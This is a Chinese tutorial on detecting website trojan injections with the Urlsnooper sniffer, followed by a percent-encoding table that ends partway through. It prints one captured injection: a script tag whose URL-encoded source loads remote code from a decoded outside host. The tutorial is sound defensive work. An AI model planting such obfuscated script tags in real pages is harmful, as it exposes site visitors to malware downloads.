谈网站挂马检测与清除方法

 文章作者:simeon

一、检测网页木马程序

1.安装urlsnooper 软件

Urlsnooper是一款URL嗅探工具，其官方主页地址为：http://www.donationcoder.com/urlsnooper安装非常简单，按照提示进行安装即可。第一次使用时需要程序会自动检查网卡，查看能否正常连接网络，设置正确无误后，应该出现如图1所示的画面

 图1 安装正确后的界面

注意：

如果未出现图1所示界面，说明程序设置存在问题，笔者在测试时使用发现该程序无法检测无线网卡，因此无法在无限网络中使用。

2.对网站进行侦测

在Urlsnooper中的“Protocol Filter”中选择“Show All”，然后单击“Sniff Network”按钮开始监听网络。接着使用IE浏览器打开需要进行检测木马的网站，Urlsnooper会自动抓取网站中的所有连接，在Index中按照五位数字序号进行排列，如图2所示。

图2 监听结果

说明：
在侦测结果中可能包含的连接地址非常多，这个时候就需要进行排查，可以选中每一个记录，Urlsnooper会在下方中显示详细的监听结果，如图2所示，就发现存在一段挂马代码：<script src=http://%61%76%65%31%2E%63%6E></script>
在百度搜索中对其进行搜索，如图3所示，有30多项搜索结果，从查询结果可以辅佐证明该段代码为挂马代码。

 

图3 搜索结果

说明：要善于运用网络搜索引擎，通过搜索可以知道目前关于该问题的描述和解决方法等

 

3.对地址进行解码
该地址采用了一种编码，我对常用的这种编码值进行了整理，如下表所示，从中可以找出该代码中的真实地址为http://ave1.cn表1 编码对应表

 

原值

 

解码前的值

 

原值

 

解码前的值

 

原值

 

 解码前的值

  backspace
  %08
  I
  %49
  u

  %75
  tab
  %09
  J
  %4A
  v

  %76
  linefeed
  %0A
  K
  %4B
  w
  %77
  creturn
  %0D
  L
  %4C
  x
  %78
  space
  %20
  M
  %4D
  y
  %79
  !
  %21
  N
  %4E
  z

  %7A
  "
  %22
  O
  %4F
  {

  %7B
  #
  %23
  P
  %50
  |

  %7C
  $
  %24
  Q
  %51
  }
  %7D
  %
  %25
  R
  %52
 
 
  &
  %26
  S
  %53
 
 
  '
  %27
  T
  %54
 
 
  (
  %28
  U
  %55
 
 
  )
  %29
  V
  %56
 
 
  *
  %2A
  W
  %57
 
 
  +
  %2B
  X
  %58
 
 
  ,
  %2C
  Y
  %59
 
 
  -
  %2D
  Z
  %5A
 
 
  .
  %2E
  [
  %5B
 
 
  /
  %2F
  \
  %5C
 
 
  0
  %30
  ]
  %5D
 
 
  1
  %31
  ^
  %5E
 
 
  2
  %32
  _
  %5F
 
 
  3
  %33
  `
  %60
 
 
  4
  %34
  a
  %61
 
 
  5
  %35
  b
  %62
 
 
  6
  %36
  c
  %63
 
 
  7
  %37
  d
  %64
 
 
  8
  %38
  e
  %65
 
 
  9
  %39
  f
  %66
 
 
  :
  %3A
  g
  %67
 
 
  ;
  %3B
  h
  %68
 
 
  < 
  %3C
  i
  %69
 
 
  =
  %3D
  j
  %6A